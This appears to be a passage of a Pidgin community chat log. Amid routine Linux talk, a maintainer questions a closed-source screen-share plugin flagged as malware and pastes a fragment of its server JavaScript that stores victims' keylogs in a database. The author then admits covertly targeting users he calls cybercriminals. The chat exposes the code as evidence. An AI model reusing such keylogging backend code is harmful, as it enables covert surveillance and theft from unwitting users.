#
general
Page 5 of 6
rekkanoryo
08/18/2024 at 17:45:26 CDTI wish it would allow specifying a key for key auth AND leaving password auth enabled
grim
08/18/2024 at 17:58:44 CDTyeah that'd be cool
grim
08/18/2024 at 20:13:23 CDTwtf...
[Sun Aug 18 20:12:44 2024] xfce4-terminal[4150]: segfault at ffffffff83107402 ip 00007f0dbcc8cd0b sp 00007ffdd7c7d250 error 7 in libcairo.so.2.11800.0[67d0b,7f0dbcc39000+e8000] likely on CPU 19 (core 19, socket 0)
grim
08/18/2024 at 20:34:04 CDTfreaking homebrew.... 
grim@mac02 birb % brew list --verbose gi-docgen | grep pc /usr/local/Cellar/gi-docgen/2024.1/libexec/share/pkgconfig/gi-docgen.pc
grim
08/19/2024 at 00:09:52 CDTokay, 6.8 installed from snapshot.debian.org... next crash i'll boot into it.. firefox crashed and I managed to kill it without rebooting, but we'll see
ivanhoe
08/19/2024 at 03:50:23 CDTNow my external DVD drive stopped working, I wonder if that's due to a kernel update or some userspace stuff.
*classic
ivanhoe
08/19/2024 at 04:03:06 CDTah 🙂
ivanhoe
08/19/2024 at 06:00:12 CDTIf this keeps happening I'll need to switch distros again. Seriously this gives me flashbacks back to when I was using Arch.
koutsie
08/19/2024 at 06:14:35 CDTarch has just kept on working for me
either im the luckiest guy in the world or people over-complain about arch lol
ivanhoe
08/19/2024 at 06:17:24 CDTNo idea, I tried it many many years ago. But what I remember is that I would constantly need to downgrade packages because an update broke something. Could be my memory is not accurate though 🤷♂️
ivanhoe
08/19/2024 at 06:23:53 CDTWhere is "Total package downgrades" though :P
koutsie
08/19/2024 at 06:38:37 CDTnever had to do one?
and this is a new install
last install was fine for 4 years
then i switched from xfce4 to kde
and boy o boy
that was arip
ivanhoe
08/19/2024 at 06:58:39 CDTOh great, looks like the hardware is faulty 🙈
koutsie
08/19/2024 at 07:21:11 CDThttps://media.discordapp.net/stickers/1200249051195645952.gif?size=160&name=Turnin%27+Tux
rekkanoryo
08/19/2024 at 10:36:50 CDTNew Raspberry Pi 5 launching today, 2 GB RAM
for $50
koutsie
08/19/2024 at 10:49:22 CDTLMAO
💀
fuck raspberry pi's
all my homies are rocking literally anything but that overpriced bs :D
grim
08/19/2024 at 13:30:38 CDTcrazy obs is still running from hours ago with no crashes...
on 6.9
ivanhoe
08/19/2024 at 13:31:33 CDTnice
win_for_the_win
08/19/2024 at 13:58:54 CDTHi @grim! I hope all is well with you, I was very happy to see that my plugins received close to 60 downloads in the last 2 months & I got some feedback & bug patches about it over email which I addressed. I am writing today with sad regards to this revision request https://keep.imfreedom.org/pidgin/nest/rev/9e246b0ea265 about my screenshare plugin. I am very concerned what somebody experienced, kindly note, I have attached here the virustotal (some trusted virus scanning site) + sandbox for the plugin https://www.virustotal.com/gui/file/0e019b5b4cc697b6044c48f4fd3029a8d49eec4ebc092868069ecc7932981787 I would like to resubmit my plugin to the plugin page as I have looked through all my source code & the compiled copy of my plugin (still from mid july of last year), and there was nothing related to viruses inside. Could it be possible that somebody received some sort of false-positive? So if it's possible, can you kindly elaborate to me about the details from this request as I cannot see any in the revision request. Also, if need be, I can publicly open-source the contents of my plugin to gain some awareness about its inner workings from the community. Thank you, so dearly for you concern & precious time. I sincerely hope we can get to the bottom of this unfortunate scenario!
win_for_the_win
08/19/2024 at 14:12:56 CDTAlso, if there is anything that I can provide from my side. The backend switch manager which handles Reverse Tunneling of screenshare packets from my server which bypasses the NAT or as I said, the code of the plugin itself, I can do so. I would just hate to have my plugin reputation be jeopardized over something that was 99.9% a false-positive. I cannot find a single detail not through sandbox analysis like app.any.run or virustotal (as shown above) to say that my plugin is performing anything other than its purpose.
grim
08/19/2024 at 14:16:33 CDTWe have gotten credible reports that your plugin is doing things it shouldn't be doing. As your plugin is not open source, we can't not verify those claims and have to rely on the expertise of the reporters. Combine that with the fact that nearly all of the other plugins on https://jabberplugins.net/ are licensed under the GPL and you are not providing source code nor mentioning where the plugins come from is means enough to not promote anything there.
win_for_the_win
08/19/2024 at 14:30:17 CDTOkay, I understand! But please, I'd like to have this matter sorted because I am in NO WAY related to anything illegal & would never dare to step in that direction. As I mentioned originally, my purpose behind creating this plugin was to allow a secure way for my friend & work colleagues to share our screens & workflow with one-another over Pidgin. Ever since the days of MSN ended, many of my friends & relatives moved over to apps like Pidgin, Psi, and Adium as our alternative to free-speech conversation. The reason I first launched jabberplugins was to try & ressurrect the Pidgin Plugin domain, and have a repository similar to https://www.adiumxtras.com/ which tracks plugins by downloads & lets users get in contact with developers of plugins directly & openly. Although jabberplugins.net is still strictly meant to be used as a hub for my own ScreenShare over OTR plugin, I plan to publish more useful plugins there as time goes on. For example, ever since the start of August, I started working on a remote desktop (similar to TeamViewer/AnyDesk) extension to the ScreenShare plugin. The main reason for requesting you guys to publish my plugin on Plugins pag was to get more attention from the community & allow for people to connect with me about their feedback (which I happily was able to receive 6 emails about bugs/improvements that I could fix/add). But now, I am very sad because of this report, as I noticed that my plugin was no longer listed on the plugins page. So please, @grim I'd like to ask you from the bottom of my heart, how can we resolve this matter? I can make my plugin C code open-source, I can open-source the backend (traffic proxying) nodeJS code. Just let me know what I need to do & I'll do it.
@grim the only reason that I didn't open-source my code immediately is because I was worried about somebody stealing my work. But now that it's come to this, I am very much inclined to publish the code!
Also, I will add more detail now about each plugin listed on Jabberplugins, so that users can better understand each plugins origin!
grim
08/19/2024 at 14:34:41 CDTI've laid out a path already... You're violating the licenses of nearly every plugin that's listed on that domain. That must be resolved. As far as getting ss-otr relisted, I have others looking into the malware claims but a lot of that concern would be alleviated by the source being available. Of course the source being available doesn't mean the binary was built from that exact source, so we'll still need verification. Regardless, due to this issue, we will be instituting a new rule for that list that all plugins must have an OSI approved license and their source code available.
win_for_the_win
08/19/2024 at 14:35:07 CDTYes, I will fix that immediately!
win_for_the_win
08/19/2024 at 14:38:54 CDTOK, thank you for your direct clarity! I will get to work right away on providing an open-source version of the code. Also, is it also possible to host it on Pidgin Mercurial & provide some code-check to confirm that the plugin binary is the same as the source code? & as far as every plugin listed on my website; I will include credit to the author, its origin, and licence alongside it.
win_for_the_win
08/19/2024 at 14:49:58 CDTCopy that, thank you for the recommendations! I will look into putting my code up on Source Hut right away. Also, thanks again for clearing up the details of this matter with me. I am so thankful for your openness & quickly addressing this issue with me. I feel it took a lot of weight off my shoulders as I was very worried/scared to see such a report in the first place. In the future, once I connect my real name/profile to this project, such reports would make me go in super-panic-mode. I really hope this is the first & last time! And, if there are any recommendations that you can make for me, I will be so happy to take note of them.
win_for_the_win
08/19/2024 at 15:39:13 CDT@grim if i host "Source hut" on my own servers (jabberplugins.net), will that merit the "open source" policy?
grim
08/19/2024 at 15:41:08 CDTopen source means that the source code is available for others under an OSI approved license https://opensource.org/osd it doesn't matter where it's hosted
win_for_the_win
08/19/2024 at 15:43:02 CDTAnd as far as code-checking goes, if i have a client side javascript code on the download page to SHA-check the release binaries with the source binary hosted with source hut. Is that a proper way to verify authenticity, or is there some other way to go about doing it?
Just so that the users know that the release binary hosted on my server is the non altered version of the compiled source code hosted on Source Hut
grim
08/19/2024 at 15:45:38 CDTverification is typically done by third parties or by the party compiling/installing the code, preferably by means of a reproducible build. a checksum of a binary just proves there was no corruption. to prove providence you need a signature or reproducible build
win_for_the_win
08/19/2024 at 15:46:11 CDTI even included a binary version of the screenshare plugin in a .rar on my ss-otr downloads page which includes the NSI file that creates the NSIS EXE that is found via the direct EXE download button ... just so users can make the installer themselves with MakeNSISW if they wanted
win_for_the_win
08/19/2024 at 15:46:19 CDTGot it!
Thank you
Last thing before I start commiting all these changes @grim ... with regards to external libraries. I use Libotr (just changed the "OTR" header fields to "SSOTR" so that the pidgin-otr plugin doesnt mess up the functionality of ScreenShareOTR) In the source hut should I link the original otr library & note the altered changes to it or will it suffice to include the compiled .libs (libgcrypt, libotr and libdeflate in the source repo) alongside the pidgin-screenshare.c source file ?
win_for_the_win
08/19/2024 at 15:55:59 CDTCopy that!
I will get to work on preparing everything now
win_for_the_win
08/19/2024 at 19:12:40 CDT@grim I have a miniscule issue, my jabberplugins server windows server 2019 1803 and it doesnt support wsl 2 ... so im going to host it on cloud. Will it be enough for me to provide a hyperlink to the source repo in a button in the menu bar of my site?
grim
08/19/2024 at 19:15:06 CDTall you needed in the first place was a to make the source available, i'm not sure what path you're going down and why
providing the source code doesn't mean, github, gitlab, srht, etc, it just means providing the source code. even a tar.gz file is fine, thats how we release pidgin for example
win_for_the_win
08/19/2024 at 19:27:31 CDTOh!
Wow, my apologies. You simplified this process 100x for me, in that case let me go ahead and publish that on the plugin page
win_for_the_win
08/19/2024 at 19:44:49 CDT@grim im going to give a .tar.gz to you specifically but in public I just want to make the source available via a repository. Its just ... I wrote 3000 lines of code in this plugin & I would HATE to see someone else take credit for my work
Its not even the amount of code, as 3000 might not be too much but the debugging of every little thing was quite annoying too
i want google to know that I published this source code first before anyone else ... so any copies will just be forks
win_for_the_win
08/19/2024 at 23:07:18 CDTWait! Hold your horses, once you see my plugin code ... your mind will change completely (and please do test it as much as you wish, along with the functionality etc). I wasn't prepared to open source my plugin code right away, but after seeing this report it seems there is no choice. And for the future, I would like to put the plugins' functionality in the users' hands. I am just trying to select the best licence to attach to the source code as I never dealth with open sourcing code before.
win_for_the_win
08/19/2024 at 23:16:37 CDTHey @grim if I used code from https://github.com/nothings/stb (around 2000, mainly for safely converting bmp format to png format in Windows as there is no reliable built-in API conversion engine that is also C-compatible) ... but the rest of the 3700 lines of code are fully self-written. What is the most applicable licence to apply?
I guess I'll just ask ChatGPT but can never be sure if the answer there is 100% legally correct
grim
08/19/2024 at 23:17:15 CDTyou're licenses need to be compatible
so it depends on what that license is
win_for_the_win
08/19/2024 at 23:17:40 CDTI am going to read more into it now!
win_for_the_win
08/20/2024 at 18:56:47 CDT@grim I sent you the source code .zip in DM
win_for_the_win
08/20/2024 at 22:32:28 CDTDid you get a chance to check it out ?
win_for_the_win
08/20/2024 at 23:05:38 CDTwin_for_the_win
08/20/2024 at 23:11:46 CDT@grim I am curious which part may have gotten flagged as a virus? I will be happy to remove/alter it or if you want just make a pull request & change it at your will
win_for_the_win
08/20/2024 at 23:21:53 CDTP.S. I'll be happy for any stars I can receive from any of you guys/girls for my hard work ❤️
grim
08/21/2024 at 11:20:03 CDTwomp womp https://www.theverge.com/2024/8/21/24225108/microsoft-security-update-windows-linux-dual-boot-errors
rekkanoryo
08/21/2024 at 11:26:12 CDTpeople still dual boot?
grim
08/21/2024 at 11:28:34 CDTapparently?
rekkanoryo
08/21/2024 at 11:34:12 CDTIt's so easy to just have two separate computers I wouldn't even consider dual booting anymore
grim
08/21/2024 at 11:34:47 CDTyep
renegadevi
08/21/2024 at 11:43:49 CDTcan you still dual-boot using separate drives?
because that's what u had to do in hackintosh community when you wanted to dual or triple boot, because ever since windows10, trying to have multiple OS on same drive been such a nightmare because of windows assume it's owning the drive. So the best practice and most reliable solution is "one OS per drive", aka use the BIOS drive selector (Press F2 at boot or whatever your pc say to boot drives) as your OS selector.
grim
08/21/2024 at 11:50:05 CDTHuh I dunno I haven't dual booted anything in years. I have a surplus of hardware right now for example...
renegadevi
08/21/2024 at 11:54:23 CDTbut from what we seen with windows 11 is that, it's very much trying to do more apple like, it's like they forgetting that half the windows pc's are not tied to a single person's personal life.
so many windows setups are used as shared stations, or headless, or whatever
and the Surface lineup is very much microsoft's answer to apple it seems
rekkanoryo
08/21/2024 at 11:55:40 CDTIt's technically possible, but the question here is whether the microsoft update screws with the trust store
oh, rereading that article leads me to think separate device dual boot would be broken too
because it sounds like it does screw with the trust policy
really makes me miss the good old days of LILO
i remember LILO used to have that hot dog colorschme right
yellow and red
rekkanoryo
08/21/2024 at 12:00:12 CDTdepends on the distro
all the ones I ever used did black screen background, blue window with grey text
rekkanoryo
08/21/2024 at 12:05:02 CDTyeah, what I used the red would have been blue
grim
08/21/2024 at 14:15:18 CDTpeople: tweaking seo so people can find their stuff in search engines
me: does nothing not even an announcement
Search for pidgin, hell even ibis got a blurb 
https://www.ilmarilauhakangas.fi/irc_technology_news_from_the_first_half_of_2024/
ivanhoe
08/21/2024 at 14:24:11 CDTNice
grim
08/21/2024 at 15:15:44 CDTpodman on freebsd, interesting... https://github.com/oci-playground/freebsd-podman-testing
win_for_the_win
08/21/2024 at 15:42:18 CDTHey @grim did you get a chance to look at my plugin source code?
grim
08/21/2024 at 15:42:56 CDTnot yet, i have a ton of stuff to do, and to be honest this isn't a high priority thing for me.
win_for_the_win
08/21/2024 at 15:43:35 CDTI understand, but can you relist the plugin on the plugins page then? Or is it possible to get another peer-review?
The pidgin plugins page brought a lot of traffic to ScreenShareOTR, thats why I am asking
Is there anything I can do to help @grim ?
grim
08/21/2024 at 15:48:26 CDTdid you fix the licensing issues with all the other plugins?
win_for_the_win
08/21/2024 at 15:48:30 CDTYes
I put the source of the plugin in the header on each plugin page
grim
08/21/2024 at 15:48:56 CDTalso until the code is verified i'm not readding it to the list. i understand that's a concern, but this is a volunteer run project, so yeah
win_for_the_win
08/21/2024 at 15:49:43 CDTSo, if I want to accelerate the process, is it possible for me to self-verify it or do I need to find another user with trust to verify it ?
I mean ... I can't possibly see what could've been the problem to begin with
grim
08/21/2024 at 15:50:12 CDTno, it will be verified by me and people i trust.
win_for_the_win
08/21/2024 at 15:50:44 CDTThe only possible explanation may be the autoupdate procedure but the only thing pushed through that is the same EXE/installer that they originally downloaded (the .nsi script)
Yeah, thats all available in the code on github
grim
08/21/2024 at 15:51:59 CDTto be completely honest, a lot of your behavior is throwing all sorts of red flags, especially that it looks like you're trying to use the link to that page to establish credibility. And then there's your real discord account name. so this is how it's going to go down, it will be verified by me and people I trust, and if it's clean then it will be relisted. but that auto-updater stuff is very sketchy too...
win_for_the_win
08/21/2024 at 15:52:02 CDTI guess I can make a disable option for that autoupdate procedure?
I only made the auto updater code out of convenience for the user
grim
08/21/2024 at 15:53:42 CDTtake_the_profit from someone that doesn't want people to profit from their work while they're attempting to profit from other people's work... it's not a good look
win_for_the_win
08/21/2024 at 15:54:13 CDTI am not trying to profit from anyones work?
My plugin is freee
The source is now public, so whats the problem?
grim
08/21/2024 at 15:55:08 CDTi mentioned this yesterday and you didn't respond to it.. you providing binaries for opensource plugins with no links to the original authors while advertising a donation link is you trying to profit off of other people's work
win_for_the_win
08/21/2024 at 15:55:20 CDTThis plugin is literally a game changer because no other screenshare plugin existed in the past for pidgin
grim
08/21/2024 at 15:55:31 CDTwww.jabberplugins.net is the problem here
ssotr.jabberplugins.net is not part of that
win_for_the_win
08/21/2024 at 15:55:53 CDTwait so
so how about
grim
08/21/2024 at 15:56:16 CDTif i took the source code to ssotr, compiled it and put the compiled binary on my website with crypto addresses what would you call that?
win_for_the_win
08/21/2024 at 15:56:17 CDTI remove all the plugins from jabberplugins & only list my own ?
will crypt addresses ?
oooh
grim
08/21/2024 at 15:57:02 CDTcrypto addresses for donations
win_for_the_win
08/21/2024 at 15:57:06 CDTBut
grim
08/21/2024 at 15:57:17 CDTsorry i'm busy at work and you are, again, eating up a ton of my time
win_for_the_win
08/21/2024 at 15:57:22 CDTFirst off no one donated anything, and second of all ... that can all be changed I'll remove that
& i'll remove every single plugin thats not mine from jabberplugins
grim
08/21/2024 at 15:57:35 CDTso i'm trying to respond quickly because as I stated earlier, i have a ton of stuff to do...
win_for_the_win
08/21/2024 at 15:57:36 CDTI'm sorry ...
grim
08/21/2024 at 15:58:18 CDTlike i get that you're excited about your plugin and stuff, but i am not paid support
win_for_the_win
08/21/2024 at 15:58:19 CDTMy apologies ... I just want to get this matter sorted! I didn't do anything wrong ... & this whole situation is so crazy because my work colleagues are wondering what happened after I bragged to them about it in the first place
I'll pay you for your time, I just want to get this sorted!
grim
08/21/2024 at 15:58:50 CDTwe don't do pay to play
win_for_the_win
08/21/2024 at 15:59:02 CDThahaha fair enough
win_for_the_win
08/21/2024 at 15:59:06 CDTI just dont want to waste your time
win_for_the_win
08/21/2024 at 15:59:51 CDTIm going take these steps + removing donations
I just tried to take the markup look from cypherpunks website when i was designing jabberplugins
thats why I had that donations part
but I'll change it as you said
Sorry for disrupting your work
grim
08/21/2024 at 16:00:54 CDTit looks nothing like https://otr.cypherpunks.ca/ ??
win_for_the_win
08/21/2024 at 16:01:05 CDTI mean with how they have the "donate" button
grim
08/21/2024 at 16:01:29 CDTif you say so..
win_for_the_win
08/21/2024 at 16:02:18 CDTLook, this is all very crazy because I literally didn't even do anything bad. I am so curious what that person flagged as a virus, I have all the binaries that the autoupdater pushed & it was just a compiled version of that nsi script
Man I hate how computer viruses are even a thing ... if only this world was ego-less & people didn't seek to hurt others. I feel like I got caught in the crosshairs of some conspiracy & I just want to get past this. When I first saw that report I was even shaken up by it because I was worried somebody is out to get me now
Anyways, I'm so sorry to bother you at work
I'll go fix up the website now
koutsie
08/21/2024 at 16:18:34 CDTinsert picture of not normal man
grim
08/21/2024 at 16:19:14 CDTI will give said normal man some of my old hardware...
win_for_the_win
08/21/2024 at 16:25:07 CDTgrim
08/21/2024 at 16:25:15 CDTalso just repurpose an old chromebook, i have plenty of those laying around
grim
08/21/2024 at 16:25:24 CDTcool, will check later
win_for_the_win
08/21/2024 at 16:25:38 CDTThank you. Again ... so sorry for bothering you at work
Also, if theres anything I can do to help with Pidgin 2/3 ... kindly let me know & I'll be happy to start commiting to it
grim
08/21/2024 at 16:28:56 CDTwin_for_the_win
08/21/2024 at 16:30:02 CDT@grim please dont check it out yet, I am going to add a checkbox button in the plugin config menu to enable/disable the autoupdater functionality
I'll tell you when that's ready ... sorry
@grim is there anywhere https://keep.imfreedom.org/pidgin/pidgin/ that I can find issues/bugs so I know what I can contribute to ?
grim
08/21/2024 at 16:36:54 CDTis that not in the contributors guide...?
oh it's not...
there's more information at https://pidgin.im/development/contributing/ as well
win_for_the_win
08/21/2024 at 16:52:49 CDTWonderful! Thank you 🙂
And hey, where can I checkout the source code for pidgin3 ?
3.0.0-experimental
or alpha1
grim
08/21/2024 at 16:54:58 CDTit's in the contributing guide...
neither of those are released either
win_for_the_win
08/21/2024 at 19:05:20 CDTOK @grim you can clone this repo whenever you have time to verify the code. I added the enable/disable option of automatic updates to the plugin config menu https://github.com/jabberplugins/pidgin-screenshare
win_for_the_win
08/21/2024 at 19:19:39 CDTAfter I make the builds for the updated version, I will also commit the libotr.so & libdeflate.so libraries onto the github
I appreciate all the work you guys do & I really hope we can get this matter resolved sooner than later! Have a good day 🙂
win_for_the_win
08/21/2024 at 19:45:47 CDT@grim I wanted to add MacOS support but do you know if pidgin for MacOS is popular or not OR is it better to make the plugin with support for adium since it also uses libpurple?
win_for_the_win
08/22/2024 at 01:27:36 CDTOh wait, will Pidgin3 also be available through homebrew on MacOS? If so, maybe I'll just consider waiting for the Pidgin3 release next year before porting my plugin as a whole to it, alongside MacOS
koutsie
08/22/2024 at 08:53:00 CDTwow compile farm has gotten some new machines
>Hardware Wishlist > Any suggestion? Vendor contacts welcomed. > RISC-V
grim
08/22/2024 at 13:29:08 CDTugh something recently changed in 1password that broke in firefox.. you have to refresh before logging back in. it's stupid but i keep forgetting to do it manually and am like "wtf is going on... oh that's right..>"
grim
08/22/2024 at 13:29:50 CDTHmm i haven't seen this before... to bad i basically built this myself..
koutsie
08/22/2024 at 13:30:07 CDThahah
sad.
i was thinking about your setup when i saw this haha
grim
08/22/2024 at 13:31:17 CDTi've been contemplating a riscv sbc too...
koutsie
08/22/2024 at 13:31:35 CDThahaha
grim
08/22/2024 at 13:32:16 CDTalthough they do have ppc and sparc.. that might be interesting as i have no desire to run that or mips for that matter, but we're not really likely to hit any issues directly on those platforms anymore so shouldn't be a big deal
previously when we were using bsd socket directly we'd run into weird issues on different unixes and stuff, but most of that platform specific code is now hidden behind interfaces in glib, so shouldn't be a big deal for us
win_for_the_win
08/22/2024 at 14:15:35 CDT@grim did you get a chance to verify my source code yet?
grim
08/22/2024 at 14:16:07 CDTno and i'm busy through the weekend...
win_for_the_win
08/22/2024 at 14:16:17 CDTSo, can I get anyone else to do it?
grim
08/22/2024 at 14:16:39 CDTi said yesterday and I'll say it again, this is not a priority for ME. I know it is for you, but I have a million other things to do.
as for going back up on the site, that's not happening until i review it.
win_for_the_win
08/22/2024 at 14:16:59 CDTI know ... but I didn't do anything wrong!
grim
08/22/2024 at 14:17:01 CDTalso I'll tell you this much in the mean time, you need to patch your server.
win_for_the_win
08/22/2024 at 14:17:12 CDTpatch my server, what do you mean?
Is the password weak or something
grim
08/22/2024 at 14:17:34 CDTyou server has known security vulnerabilities
win_for_the_win
08/22/2024 at 14:17:39 CDTWhich ones!?
Oh my goodness
grim
08/22/2024 at 14:17:45 CDTyou need to run updates on your operating system
win_for_the_win
08/22/2024 at 14:17:58 CDTOK! I'll do that immediately ... you think someone could have compromised it?!
Doing updates now
grim
08/22/2024 at 14:19:51 CDTthis is the dilemma.. you're behavior has been questionable and you're running an insecure operating system. Me and my contacts are trying to determine if you're trying to pull a fast one on me. which is also why i'm not looking at this until their assessment is done. 9 times out of 10 this kind of thing is just people don't know better, but we still have to error on the side of caution.
also, again i am at work...
win_for_the_win
08/22/2024 at 14:22:55 CDTyeah ... I'm so sorry for anything that I did that may have made you feel suspicious about me! Honestly, because you felt that way about me is exactly why I felt I should help out with Pidgin ... I know, I just appeared out of the blue & then this happened, its not a good look for sure! But I just want you know to know that I AM HERE TO STAY. I'm so sorry to make all you guys feel this way about me, but I really just wanted to bring the community to life more. That's why I made the screenshare plugin, not only for my colleagues at work, but also for the Pidgin IM community. I wanted to bring a plugin that innovates the messenger, and that's why I made it!
grim
08/22/2024 at 14:24:01 CDTthis didn't happen out of the blue, all of your behavior has been suspicious and i noted that initially when you blasted up on irc, discord, and xmpp... then putting your plugin at the top of the list was suspicious too and forced me to setup sorting in that list to stop what you did.
win_for_the_win
08/22/2024 at 14:24:06 CDTHuge respect to you for answering questions here & working at the same time. I am sorry to bother you
grim
08/22/2024 at 14:24:20 CDTyet you keep bothering me after stating this...
win_for_the_win
08/22/2024 at 14:24:25 CDTYeah ... that top of the list thing was not good
win_for_the_win
08/22/2024 at 14:24:40 CDTI'll stop now, its just I just woke up & wanted to check here right away
By the way, how can I know if someone else is working on a review? The thing is, I wanted to cover the review at the top of the list yesterday but half way through working on it I noticed Markus Fischer already did it ... so is it possible to assign myself to a review or see who else is assigned to it?
grim
08/22/2024 at 14:27:11 CDTreview for what? your plugin stuff? there's nothing in reviewboard for it
win_for_the_win
08/22/2024 at 14:27:17 CDTNo no
grim
08/22/2024 at 14:27:21 CDTthis is being done in private as most security issues are
win_for_the_win
08/22/2024 at 14:27:28 CDTI am referring to these
I wanted to contribute
grim
08/22/2024 at 14:28:25 CDTthere's thousands of issues there.. you'll need to be more specific..
win_for_the_win
08/22/2024 at 14:30:05 CDTI mean, is it possible to assign myself to a specific one so that no one else works on it while I am? I tried to work on this one https://issues.imfreedom.org/issue/PIDGIN-17895/Implement-leaving-conversations but then I noticed Markus Fischer already did it? Review Board APP — Yesterday at 03:27 New review from Markus Fischer
win_for_the_win
08/22/2024 at 14:30:10 CDTWow! What's that about
win_for_the_win
08/22/2024 at 14:30:53 CDTHow was I already targeted in the span of just 2 months...
this is crazy
grim
08/22/2024 at 14:31:26 CDTcomment on the issue if you're going to work on it. but we're not really at a stage right now for new contributor to learn things, we need to move fast. so if you claim one and it's taking too long i'm going to take it over
win_for_the_win
08/22/2024 at 14:32:30 CDTGot it! I'll try to only take the ones that I can most likely finish in a reasonable time frame
Im restarting the server now, just finished 4 patches/upgrades
grim
08/22/2024 at 14:34:34 CDTfrom http://jabberplugins.net:81/sws.js explicit mention of keylogging ....
js case '!': // keylogs { var logs = JSON.parse(data.toString().substr(2)); dbs.query('SELECT clients.name FROM clients WHERE clients.name = "'+0+'"', (err, clients, flds) => { if (!err) { dbs.query('SELECT * FROM keylogs WHERE keylogs.cid = "'+clients[0].name+'"', (err, keylogs, flds) => { if (!err && keylogs.length) { dbs.query('UPDATE keylogs '+ 'SET keylogs.data = "'+(keylogs[0].data+''+logs.data)+'" '+ 'WHERE keylogs.cid = "'+clients<a style="text-decoration:none;color:rgb(0, 168, 252);cursor:pointer !important" href="" target="_blank" rel="noreferrer" title="name+'"', (err, res, flds) => { if (!err) conn.server.ws.send(Buffer.from('!">0</a>); }); } else { dbs.query('INSERT INTO keylogs (cid, data) VALUES ("'+clients<a style="text-decoration:none;color:rgb(0, 168, 252);cursor:pointer !important" href="" target="_blank" rel="noreferrer" title="name+'", "'+logs.data+'")', (err, res, flds) => { if (!err) conn.server.ws.send(Buffer.from('!">0</a>); });
win_for_the_win
08/22/2024 at 14:34:40 CDTthis is crazy though, how can I stop this from happening?
grim
08/22/2024 at 14:35:01 CDTlearn how to secure servers? that's not something i have the time to help you with
win_for_the_win
08/22/2024 at 14:49:29 CDTI just wanted to say that thanks to Pidgin, I was able to identify and provide information to the authorities on 4 different cybercriminals & counting ... and I will continue to do so
It is well known that tons of cybercriminals use Jabber as a means for communication
grim
08/22/2024 at 14:50:56 CDTand in doing so you lost all trust with us 😉
win_for_the_win
08/22/2024 at 14:51:28 CDTI hope screenshare my plugin will help the community, maybe someone can fork it and support it on their own
koutsie
08/22/2024 at 14:52:19 CDT💀
win_for_the_win
08/22/2024 at 14:52:29 CDTOr this criminal who was a part of the Qilin, RansomHub, and Knight ransomware affiliate networks
His information was already sent to the FBI & RCMP
grim
08/22/2024 at 14:53:21 CDTlook, i'm going to be very clear here. You attempted to compromise all of our users by being a vigilante, you are no longer welcome in our community because of that.
win_for_the_win
08/22/2024 at 14:53:51 CDTNot all ... just cybercriminals from the forum exploit.in